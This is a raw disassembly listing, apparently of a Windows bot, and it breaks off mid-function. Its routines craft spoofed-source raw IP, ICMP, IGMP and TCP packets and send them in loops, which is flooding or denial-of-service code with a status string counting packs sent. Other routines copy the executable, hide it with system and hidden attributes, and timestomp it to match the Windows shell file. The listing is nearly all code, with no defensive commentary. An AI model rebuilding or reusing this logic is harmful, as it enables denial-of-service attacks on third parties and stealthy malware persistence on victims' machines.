; Attributes: bp-based frame
sub_426C5A proc near ; CODE XREF: sub_4274B2+8A�p
var_100 = byte ptr -100h
push ebp
mov ebp, esp
sub esp, 100h
push esi
lea eax, [ebp+var_100]
push 100h
push eax
call dword_4372DC ; gethostname
lea eax, [ebp+var_100]
push eax
call dword_4372A0 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
and esi, 0FFFFFFh
call sub_429ACC
cdq
mov ecx, 0FFh
idiv ecx
mov eax, edx
shl eax, 18h
or eax, esi
pop esi
leave
retn
sub_426C5A endp
; =============== S U B R O U T I N E =======================================
sub_426CA7 proc near ; CODE XREF: sub_4274B2+5F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
push 10h
push 0
push esi
call sub_429690
add esp, 0Ch
mov word ptr [esi], 2
push [esp+8+arg_0]
call dword_4372BC ; inet_addr
lea edi, [esi+4]
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_426CFB
push [esp+8+arg_0]
call dword_4372A0 ; gethostbyname
test eax, eax
jz short loc_426D09
mov cx, [eax+8]
mov [esi], cx
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
push edi
call sub_429350
add esp, 0Ch
loc_426CFB: ; CODE XREF: sub_426CA7+2A�j
push [esp+8+arg_4]
call dword_4372C0 ; ntohs
mov [esi+2], ax
loc_426D09: ; CODE XREF: sub_426CA7+38�j
xor eax, eax
pop edi
inc eax
pop esi
retn
sub_426CA7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426D0F proc near ; CODE XREF: sub_42731C+109�p
; sub_42731C+14D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp ecx, 1
mov [ebp+var_4], esi
jle short loc_426D3E
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_426D30: ; CODE XREF: sub_426D0F+29�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec eax
jnz short loc_426D30
pop edi
cmp ecx, 1
loc_426D3E: ; CODE XREF: sub_426D0F+13�j
jnz short loc_426D4B
mov al, [edx]
mov byte ptr [ebp+var_4], al
movzx eax, word ptr [ebp+var_4]
add esi, eax
loc_426D4B: ; CODE XREF: sub_426D0F:loc_426D3E�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 20h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 20h
add eax, ecx
not eax
leave
retn
sub_426D0F endp
; =============== S U B R O U T I N E =======================================
sub_426D64 proc near ; CODE XREF: sub_4274B2+94�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
push ebp
push esi
push edi
call sub_429ACC
cdq
mov ecx, 9C40h
mov ebp, 5DCh
idiv ecx
push ebp
push 1
add edx, 1F4h
mov [esp+1Ch+var_4], edx
call sub_42B2CA
mov ebx, dword_4372C0
pop ecx
pop ecx
mov esi, eax
push ebp
or byte ptr [esi+14h], 0FFh
lea edi, [esi+20h]
mov byte ptr [esi], 4
mov byte ptr [esi+0Ch], 8
call ebx ; dword_4372C0
push [esp+14h+var_4]
mov [esi+4], ax
mov byte ptr [esi+15h], 2
call ebx ; dword_4372C0
push 2000h
mov [esi+8], ax
call ebx ; dword_4372C0
mov [esi+0Eh], ax
mov eax, [esp+14h+arg_4]
mov [esi+18h], eax
mov eax, [esp+14h+arg_0]
push 20h
push esi
mov eax, [eax+4]
mov [esi+1Ch], eax
call sub_41E322
push 10h
mov [esi+16h], ax
and byte ptr [edi], 0
and dword ptr [edi+4], 0
push edi
call sub_41E322
add esp, 10h
mov [edi+2], ax
push 31h
pop edi
loc_426DFB: ; CODE XREF: sub_426D64+AA�j
call sub_429ACC
cdq
mov ecx, 0DCh
idiv ecx
mov [edi+esi], dl
inc edi
cmp edi, ebp
jl short loc_426DFB
push 0FFh
push 3
push 2
call dword_4372B8 ; socket
test eax, eax
mov [esp+14h+arg_4], eax
jl short loc_426E90
push 10h
push [esp+18h+arg_0]
push 0
push ebp
push esi
push eax
call dword_437290 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_426E41
xor eax, eax
jmp short loc_426E93
; ---------------------------------------------------------------------------
loc_426E41: ; CODE XREF: sub_426D64+D7�j
mov edi, 5C8h
loc_426E46: ; CODE XREF: sub_426D64+119�j
mov eax, edi
sar eax, 3
cmp edi, 1158h
jg short loc_426E56
or ah, 20h
loc_426E56: ; CODE XREF: sub_426D64+ED�j
push eax
call ebx ; dword_4372C0
push 10h
mov [esi+0Eh], ax
push [esp+18h+arg_0]
push 0
push ebp
push esi
push [esp+28h+arg_4]
call dword_437290 ; sendto
add edi, 5C8h
cmp edi, 1CE8h
jl short loc_426E46
push esi
call sub_429822
pop ecx
push [esp+14h+arg_4]
call dword_4372D4 ; closesocket
loc_426E90: ; CODE XREF: sub_426D64+C1�j
xor eax, eax
inc eax
loc_426E93: ; CODE XREF: sub_426D64+DB�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_426D64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426E99 proc near ; CODE XREF: sub_426EEF+1EF�p
; sub_426EEF+249�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
xor edx, edx
push esi
mov esi, [ebp+arg_0]
cmp ecx, 1
mov [ebp+arg_4], edx
jle short loc_426EC6
lea eax, [ecx-2]
push edi
shr eax, 1
inc eax
lea edi, [eax+eax]
sub ecx, edi
loc_426EB9: ; CODE XREF: sub_426E99+27�j
movzx edi, si
add edx, edi
inc esi
dec eax
jnz short loc_426EB9
pop edi
cmp ecx, 1
loc_426EC6: ; CODE XREF: sub_426E99+12�j
jnz short loc_426ED6
movzx eax, si
mov al, [eax]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add edx, eax
loc_426ED6: ; CODE XREF: sub_426E99:loc_426EC6�j
mov ecx, edx
and edx, 0FFFFh
sar ecx, 20h
add ecx, edx
pop esi
mov eax, ecx
sar eax, 20h
add eax, ecx
not eax
pop ebp
retn
sub_426E99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426EEF proc near ; CODE XREF: sub_4274B2+173�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
xor ebx, ebx
mov esi, 2000h
xor eax, eax
lea edi, [ebp+var_C]
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], esi
mov [ebp+var_20], 800h
mov [ebp+var_1C], 80h
mov [ebp+var_18], 1000h
mov [ebp+var_14], 1
mov [ebp+var_10], ebx
stosd
mov [ebp+var_4], ebx
call sub_429ACC
push 100h
push [ebp+arg_14]
call dword_4372DC ; gethostname
push [ebp+arg_14]
call dword_4372A0 ; gethostbyname
mov eax, [eax+0Ch]
mov eax, [eax]
mov edi, [eax]
and edi, 0FFFFFFh
call sub_429ACC
cdq
mov ecx, 0FFh
idiv ecx
shl edx, 18h
or edi, edx
call sub_429ACC
cdq
idiv esi
mov al, byte_675F34
and al, 0E5h
or al, 5
mov byte_675F34, al
mov [ebp+var_8], edx
call sub_429ACC
push 0Ah
mov esi, dword_4372C0
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_30]
push eax
call esi ; dword_4372C0
push ebx
mov word_675F36, ax
call esi ; dword_4372C0
push ebx
mov word_675F48, ax
call esi ; dword_4372C0
push 5Ch
mov word_675F4A, ax
mov byte_675F28, 14h
mov byte ptr word_675F2A, bl
call esi ; dword_4372C0
mov word_675F2C, ax
call sub_429ACC
cdq
mov ecx, 0ED60h
idiv ecx
add edx, 396h
push edx
call esi ; dword_4372C0
mov word_675F30, ax
mov eax, [ebp+arg_4]
mov byte_675F3C, 80h
mov byte_675F3D, 6
mov word_675F3E, bx
mov dword_675F40, edi
mov dword_675F44, eax
call sub_429ACC
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call esi ; dword_4372C0
push [ebp+arg_18]
mov word_675F4C, ax
call esi ; dword_4372C0
push 20000000h
mov word_675F4E, ax
call dword_4372E0 ; ntohl
mov dword_675F50, eax
mov eax, dword_675F5C
and al, 5Fh
mov dword_675F54, ebx
or al, 50h
mov byte_675F82, bl
mov dword_675F5C, eax
call sub_429ACC
push 3
cdq
pop ecx
idiv ecx
mov dword_675F58, edx
call sub_429ACC
push 2
mov word_675F74, 4000h
cdq
pop ecx
mov word_675F70, bx
idiv ecx
mov word_675F76, bx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov byte_675F60, dl
call sub_429ACC
mov edi, eax
shl edi, 10h
call sub_429ACC
or edi, eax
push edi
call esi ; dword_4372C0
movzx eax, ax
mov edi, offset dword_6737B0
push 68h
push ebx
push edi
mov dword_675F50, eax
call sub_429690
mov ebx, offset byte_675F28
push 10h
push ebx
push edi
call sub_429350
mov eax, edi
push 10h
push eax
call sub_426E99
push 8
push offset dword_675F40
push edi
mov word_675F2A, ax
call sub_429350
push 1
push offset byte_675F3D
push offset byte_6737B9
call sub_429350
add esp, 38h
push 38h
call esi ; dword_4372C0
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push 2
push eax
push offset word_6737BA
call sub_429350
mov eax, offset dword_6737BC
push 38h
push offset word_675F4C
mov esi, eax
push eax
call sub_429350
push 44h
push esi
call sub_426E99
add esp, 20h
mov word_675F76, ax
lea eax, [ebp+arg_0]
push 10h
push eax
push 1
push 5Ch
push ebx
push [ebp+arg_10]
call dword_437290 ; sendto
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_426EEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427162 proc near ; CODE XREF: sub_4274B2+85�p
var_210 = byte ptr -210h
var_80 = byte ptr -80h
var_7F = byte ptr -7Fh
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
mov esi, dword_4372BC
push edi
push [ebp+arg_0]
call esi ; dword_4372BC
push [ebp+arg_4]
mov [ebp+var_30], eax
call esi ; dword_4372BC
push 0Eh
mov [ebp+arg_4], eax
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_7F]
mov [ebp+var_80], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_210]
push eax
push 202h
call dword_4372B4 ; WSAStartup
test eax, eax
jnz short loc_4271C9
xor esi, esi
inc esi
push esi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4372C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_4271D0
loc_4271C9: ; CODE XREF: sub_427162+48�j
xor eax, eax
jmp loc_427317
; ---------------------------------------------------------------------------
loc_4271D0: ; CODE XREF: sub_427162+65�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_437288 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_42730C
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_44], 2
call sub_429ACC
mov esi, dword_4372C0
push eax
call esi ; dword_4372C0
mov edi, [ebp+var_30]
push 2Ch
mov [ebp+var_42], ax
mov [ebp+var_40], edi
mov [ebp+var_2C], 47h
call esi ; dword_4372C0
push ebx
mov [ebp+var_2A], ax
call esi ; dword_4372C0
mov [ebp+var_28], ax
mov eax, [ebp+arg_4]
push ebx
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 2
mov [ebp+var_22], bx
mov [ebp+var_2B], bl
mov [ebp+var_1C], edi
mov [ebp+var_20], eax
call esi ; dword_4372C0
push ebx
mov [ebp+var_18], ax
call esi ; dword_4372C0
push 1
mov [ebp+var_16], ax
mov [ebp+var_10], 11h
mov [ebp+var_F], 5
call esi ; dword_4372C0
push offset a0_0_0_0 ; "0.0.0.0"
mov [ebp+var_6], ax
mov [ebp+var_8], bl
mov [ebp+var_7], bl
call dword_4372BC ; inet_addr
push 10h
mov [ebp+var_C], eax
pop esi
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_80]
mov [ebp+var_4], edi
push eax
mov [ebp+var_E], bx
call sub_429350
lea eax, [ebp+var_80]
push esi
push eax
call sub_41E322
mov [ebp+var_E], ax
lea eax, [ebp+var_2C]
push 1Ch
push eax
lea eax, [ebp+var_80]
push eax
call sub_429350
lea eax, [ebp+var_10]
push esi
push eax
lea eax, [ebp+var_64]
push eax
call sub_429350
push 4
lea eax, [ebp+var_54]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_80]
push 2Ch
push eax
call sub_41E322
add esp, 40h
push eax
call dword_4372A4 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 1Ch
push eax
lea eax, [ebp+var_80]
push eax
call sub_429350
add esp, 0Ch
lea eax, [ebp+var_44]
push esi
push eax
push ebx
lea eax, [ebp+var_80]
push 2Ch
push eax
push [ebp+arg_0]
call dword_437290 ; sendto
xor ebx, ebx
inc ebx
loc_42730C: ; CODE XREF: sub_427162+84�j
push [ebp+arg_0]
call dword_4372D4 ; closesocket
mov eax, ebx
loc_427317: ; CODE XREF: sub_427162+69�j
pop edi
pop esi
pop ebx
leave
retn
sub_427162 endp
; =============== S U B R O U T I N E =======================================
sub_42731C proc near ; CODE XREF: sub_4274B2+AB�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 194h
lea eax, [esp+194h+var_190]
push ebx
push ebp
push esi
push edi
push eax
push 202h
call dword_4372B4 ; WSAStartup
test eax, eax
jnz loc_42748F
call sub_429ACC
push 38h
push 1
call sub_42B2CA
pop ecx
xor edi, edi
pop ecx
mov esi, eax
push 1
push edi
push edi
push 2
push 3
push 2
call dword_4372C4 ; WSASocketA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [esp+1A4h+var_194], ebx
jz loc_42748F
push 38h
push edi
push esi
call sub_429690
mov edi, dword_4372C0
add esp, 0Ch
mov byte ptr [esi+0Ch], 5
mov byte ptr [esi], 4
push 7A69h
call edi ; dword_4372C0
push 2000h
mov [esi+8], ax
call edi ; dword_4372C0
mov ebp, [esp+1A4h+arg_8]
and byte ptr [esi+15h], 0
mov [esi+0Eh], ax
mov eax, [esp+1A4h+arg_4]
push 10h
push ebp
push 0
mov byte ptr [esi+14h], 80h
mov [esi+18h], eax
mov eax, [ebp+4]
push 31h
push esi
push ebx
mov ebx, dword_437290
mov [esi+1Ch], eax
and byte ptr [esi+21h], 0
mov byte ptr [esi+20h], 8
call ebx ; dword_437290
cmp eax, 0FFFFFFFFh
jz loc_42748F
push 38h
call edi ; dword_4372C0
push 1
mov [esi+4], ax
call edi ; dword_4372C0
push 21D9h
mov [esi+0Eh], ax
mov byte ptr [esi], 4
call edi ; dword_4372C0
push 2000h
mov [esi+8], ax
call edi ; dword_4372C0
or [esi+0Eh], ax
mov eax, [esp+1A4h+arg_4]
or byte ptr [esi+14h], 0FFh
and byte ptr [esi+15h], 0
mov [esi+18h], eax
mov eax, [ebp+4]
push 10h
push esi
mov [esi+1Ch], eax
call sub_426D0F
pop ecx
mov [esi+16h], ax
pop ecx
and byte ptr [esi+21h], 0
push 10h
push ebp
push 0
push 31h
push esi
mov byte ptr [esi+20h], 8
push [esp+1B8h+var_194]
call ebx ; dword_437290
cmp eax, 0FFFFFFFFh
jz short loc_42748F
push 38h
call edi ; dword_4372C0
push 1
mov [esi+4], ax
call edi ; dword_4372C0
push 2000h
mov [esi+0Eh], ax
call edi ; dword_4372C0
or [esi+0Eh], ax
push 20h
push esi
call sub_426D0F
pop ecx
mov [esi+16h], ax
pop ecx
and byte ptr [esi+20h], 0
and byte ptr [esi+21h], 0
push 10h
push ebp
push 0
push 34h
push esi
push [esp+1B8h+var_194]
call ebx ; dword_437290
cmp eax, 0FFFFFFFFh
jnz short loc_427493
loc_42748F: ; CODE XREF: sub_42731C+1C�j
; sub_42731C+4F�j ...
xor eax, eax
jmp short loc_4274A7
; ---------------------------------------------------------------------------
loc_427493: ; CODE XREF: sub_42731C+171�j
push esi
call sub_429822
pop ecx
push [esp+1A4h+var_194]
call dword_4372D4 ; closesocket
xor eax, eax
inc eax
loc_4274A7: ; CODE XREF: sub_42731C+175�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 194h
retn
sub_42731C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4274B2 proc near ; DATA XREF: sub_40A938+7DD1�o
var_14C = dword ptr -14Ch
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 48h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
mov dword ptr [eax+11Ch], 1
mov eax, [ebp+var_14C]
mov [ebp+var_8], eax
lea eax, [ebp+var_148]
push eax
call sub_41E326
mov esi, dword_4372B8
pop ecx
mov edi, 0FFh
push edi
push 3
push 2
call esi ; dword_4372B8
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
xor ebx, ebx
lea eax, [ebp+var_148]
push ebx
push eax
call sub_426CA7
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_4276AD
cmp [ebp+var_44], ebx
mov [ebp+arg_0], ebx
jl short loc_427578
mov ebx, offset dword_457CD8
loc_42752F: ; CODE XREF: sub_4274B2+C4�j
lea eax, [ebp+var_148]
push ebx
push eax
call sub_427162
call sub_426C5A
push eax
lea eax, [ebp+var_2C]
push eax
call sub_426D64
add esp, 10h
lea eax, [ebp+var_2C]
push eax
push ebx
call sub_41E326
pop ecx
push eax
push [ebp+var_4]
call sub_42731C
add esp, 0Ch
push 0Ah
call dword_43718C ; Sleep
inc [ebp+arg_0]
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_44]
jle short loc_42752F
loc_427578: ; CODE XREF: sub_4274B2+76�j
and [ebp+arg_0], 0
lea eax, [ebp+var_148]
push eax
call sub_41E326
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
jz loc_4276AD
push 10h
lea eax, [ebp+var_1C]
push 0
push eax
call sub_429690
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], ebx
push [ebp+var_48]
call dword_4372C0 ; ntohs
push 6
push 1
push 2
mov [ebp+var_1A], ax
call esi ; dword_4372B8
test eax, eax
mov [ebp+var_4], eax
jl loc_4276AD
push edi
push 3
push 2
call esi ; dword_4372B8
test eax, eax
mov [ebp+var_C], eax
jl loc_4276AD
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_4372C8 ; connect
mov ebx, dword_4372D4
cmp eax, 0FFFFFFFFh
jnz short loc_4275FE
push [ebp+var_4]
call ebx ; dword_4372D4
loc_4275FE: ; CODE XREF: sub_4274B2+145�j
push 3
call dword_43718C ; Sleep
cmp [ebp+var_44], 0
jz short loc_427640
loc_42760C: ; CODE XREF: sub_4274B2+18C�j
push [ebp+var_48]
lea eax, [ebp+var_148]
lea esi, [ebp+var_1C]
push eax
push [ebp+var_C]
sub esp, 10h
mov edi, esp
movsd
movsd
movsd
movsd
call sub_426EEF
add esp, 1Ch
push 0Ah
call dword_43718C ; Sleep
inc [ebp+arg_0]
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_44]
jnz short loc_42760C
loc_427640: ; CODE XREF: sub_4274B2+158�j
push [ebp+var_4]
call ebx ; dword_4372D4
push [ebp+var_3C]
call sub_42355A
cmp [ebp+var_34], 0
pop ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aSsoce0jbtxi ; "sSOce0JbTXI/"
mov esi, offset aSSSWithDPackS ; "%s %s (%s) with (%d) pack(s)"
jnz short loc_427688
cmp [ebp+var_38], 0
jnz short loc_42768E
push [ebp+var_44]
lea eax, [ebp+var_148]
push eax
push ebx
push edi
lea eax, [ebp+var_C8]
push esi
push eax
push [ebp+var_8]
call sub_41CD84
add esp, 1Ch
loc_427688: ; CODE XREF: sub_4274B2+1AF�j
cmp [ebp+var_38], 0
jz short loc_4276AD
loc_42768E: ; CODE XREF: sub_4274B2+1B5�j
push [ebp+var_44]
lea eax, [ebp+var_148]
push eax
push ebx
push edi
lea eax, [ebp+var_C8]
push esi
push eax
push [ebp+var_8]
call sub_41CD0E
add esp, 1Ch
loc_4276AD: ; CODE XREF: sub_4274B2+6A�j
; sub_4274B2+DC�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4274B2 endp
; =============== S U B R O U T I N E =======================================
sub_4276B6 proc near ; CODE XREF: sub_40A86F+47�p
; sub_41E380+F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, offset asc_43D938 ; " "
push edi
push esi
push [esp+10h+arg_4]
call sub_429B8E
mov edi, [esp+14h+arg_0]
xor ebx, ebx
inc ebx
pop ecx
cmp [esp+10h+arg_8], ebx
pop ecx
mov [edi], eax
jle short loc_4276F1
loc_4276D9: ; CODE XREF: sub_4276B6+39�j
push esi
push 0
call sub_429B8E
pop ecx
mov [edi+ebx*4], eax
test eax, eax
pop ecx
jz short loc_4276F1
inc ebx
cmp ebx, [esp+0Ch+arg_8]
jl short loc_4276D9
loc_4276F1: ; CODE XREF: sub_4276B6+21�j
; sub_4276B6+32�j
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_4276B6 endp
; =============== S U B R O U T I N E =======================================
sub_4276F7 proc near ; CODE XREF: sub_40A938+4BED�p
; sub_40A938+4CAE�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_4276F7 endp
; =============== S U B R O U T I N E =======================================
sub_42770C proc near ; CODE XREF: sub_40A938+4CBF�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_42771E
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42771E: ; CODE XREF: sub_42770C+D�j
movzx eax, al
shr eax, 4
and eax, 1
retn
sub_42770C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427728 proc near ; CODE XREF: sub_4277E9+EF�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
push edi
lea eax, [ebp+var_110]
push 104h
push eax
call dword_437134 ; GetWindowsDirectoryA
push 1
push offset aShell ; "Shell"
push offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"...
push 80000002h
call sub_421277
xor ebx, ebx
add esp, 10h
cmp eax, ebx
jz short loc_4277E2
push eax
lea eax, [ebp+var_110]
push eax
call dword_437090 ; lstrcatA
mov esi, dword_43705C
mov edi, 80h
push ebx
push edi
push 3
push ebx
push 1
lea eax, [ebp+var_110]
push 80000000h
push eax
call esi ; dword_43705C
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_4277E2
lea ecx, [ebp+var_C]
push ecx
push ebx
push ebx
push eax
call dword_437130 ; GetFileTime
push [ebp+var_4]
call dword_437044 ; CloseHandle
push ebx
push edi
push 3
push ebx
push 2
push 40000000h
push [ebp+arg_0]
call esi ; dword_43705C
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4277E2
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
push esi
call dword_43712C ; SetFileTime
push esi
call dword_437044 ; CloseHandle
xor eax, eax
inc eax
jmp short loc_4277E4
; ---------------------------------------------------------------------------
loc_4277E2: ; CODE XREF: sub_427728+3B�j
; sub_427728+71�j ...
xor eax, eax
loc_4277E4: ; CODE XREF: sub_427728+B8�j
pop edi
pop esi
pop ebx
leave
retn
sub_427728 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4277E9 proc near ; CODE XREF: sub_418D49+12D�p
; sub_422394+99�p
var_30C = byte ptr -30Ch
var_208 = byte ptr -208h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30Ch
push ebx
push esi
mov esi, 104h
lea eax, [ebp+var_208]
push esi
xor ebx, ebx
push eax
push ebx
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
push [ebp+arg_4]
lea eax, [ebp+var_104]
push [ebp+arg_0]
push offset dword_445D48
push esi
push eax
call sub_429AEE
add esp, 14h
lea eax, [ebp+var_208]
push eax
lea eax, [ebp+var_30C]
push eax
call dword_4370A4 ; lstrcpyA
lea eax, [ebp+var_30C]
push eax
call dword_456E8C ; PathRemoveFileSpecA
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jz loc_4278F7
lea eax, [ebp+var_104]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_42788D
lea eax, [ebp+var_104]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_42788D: ; CODE XREF: sub_4277E9+90�j
mov esi, dword_437064
push edi
push ebx
jmp short loc_4278BB
; ---------------------------------------------------------------------------
loc_427897: ; CODE XREF: sub_4277E9+E6�j
call dword_43716C ; RtlGetLastWin32Error
test ebx, ebx
jnz short loc_4278D1
cmp eax, 20h
jz short loc_4278AB
cmp eax, 5
jnz short loc_4278D1
loc_4278AB: ; CODE XREF: sub_4277E9+BB�j
xor ebx, ebx
push 3A98h
inc ebx
call dword_43718C ; Sleep
push 0
loc_4278BB: ; CODE XREF: sub_4277E9+AC�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_208]
push eax
call esi ; dword_437064
mov edi, eax
test edi, edi
jz short loc_427897
loc_4278D1: ; CODE XREF: sub_4277E9+B6�j
; sub_4277E9+C0�j
lea eax, [ebp+var_104]
push eax
call sub_427728
pop ecx
lea eax, [ebp+var_104]
push 7
push eax
call dword_437068 ; SetFileAttributesA
test edi, edi
pop edi
jz short loc_4278F7
xor eax, eax
inc eax
jmp short loc_4278F9
; ---------------------------------------------------------------------------
loc_4278F7: ; CODE XREF: sub_4277E9+7A�j
; sub_4277E9+107�j
xor eax, eax
loc_4278F9: ; CODE XREF: sub_4277E9+10C�j
pop esi
pop ebx
leave
retn
sub_4277E9 endp
; =============== S U B R O U T I N E =======================================
sub_4278FD proc near ; CODE XREF: sub_420A75+B4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 40h
mov edx, offset dword_675FF8
pop ecx
xor eax, eax
mov edi, edx
rep stosd
mov eax, [esp+4+arg_4]
pop edi
cmp eax, [esp+arg_8]
jg short loc_42792E
push esi
mov esi, edx
sub esi, eax
loc_42791C: ; CODE XREF: sub_4278FD+2E�j
mov ecx, [esp+4+arg_0]
mov cl, [eax+ecx]
mov [esi+eax], cl
inc eax
cmp eax, [esp+4+arg_8]
jle short loc_42791C
pop esi
loc_42792E: ; CODE XREF: sub_4278FD+18�j
mov eax, edx
retn
sub_4278FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427931 proc near ; CODE XREF: sub_40A938+7A6�p
; sub_40A938+7C3�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_4279BE
mov eax, [ebp+arg_4]
cmp eax, esi
